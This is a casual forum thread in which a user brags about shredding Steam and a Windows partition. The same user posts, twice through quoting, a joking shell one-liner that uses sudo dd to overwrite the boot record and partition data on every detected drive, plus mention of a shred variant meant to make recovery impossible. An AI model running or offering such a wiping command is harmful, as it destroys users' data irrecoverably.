The last poster wins

TheCalliton

Anyone going crazy over the Steam sale?

Not exactly. You see, I used shred on Steam before I did the same to Windows, shred took the task seriously. It overwrote Steam with 25 passes of random binary junk, renamed it 10 times, deleted it and then blanked it with zeros to destroy all traces of it's existence. It was lovely. ;D

Now I don't have steam, nor do I intend to have it ever again. :happy:

Edited by Werne

Not exactly. You see, I used shred on Steam before I did the same to Windows, shred took the task seriously. It overwrote Steam with 25 passes of random binary junk, renamed it 10 times, deleted it and then blanked it with zeros to destroy all traces of it's existence. It was lovely. ;D

GASSSSPPPPPPPPP!!!! :sick:

And then I did the same to the entire Windows partition, 25 passes of binary junk over a 30GB partition, partition removal, blanking blanking with zeros. And that was even more lovely. ;D

Then I overwrote it with Linux, to be sure it died.

In other news, I made a small script that is not to be executed if you like your PC:

while read line; do sudo -n dd if=$SHELL of=$line bs=512 count=1; done < df -T|awk '{print $1}'|grep '/sd\|/hd'|sed 's/[0-9]*//g'|awk '!a[$0]++'
I said don't execute because it may work for Windows as well.

It destroys the master boot record and partitioning data on all detected storage drives, I have an ever better version that uses shred instead of dd for better destruction and inability to recover the data. And I shall back up my MBR just so I can execute it and see my PC burn. Muahaha! :devil:

And then I did the same to the entire Windows partition, 25 passes of binary junk over a 30GB partition, partition removal, blanking blanking with zeros. And that was even more lovely. ;D

Then I overwrote it with Linux, to be sure it died.

In other news, I made a small script that is not to be executed if you like your PC:

while read line; do sudo -n dd if=$SHELL of=$line bs=512 count=1; done < df -T|awk '{print $1}'|grep '/sd\|/hd'|sed 's/[0-9]*//g'|awk '!a[$0]++'
I said don't execute because it may work for Windows as well.

It destroys the master boot record and partitioning data on all detected storage drives, I have an ever better version that uses shred instead of dd for better destruction and inability to recover the data. And I shall back up my MBR just so I can execute it and see my PC burn. Muahaha! :devil:

NOOOOOOOOO!!! this can't be happening, this can't be happening, this can't be happening :sick: :nuke: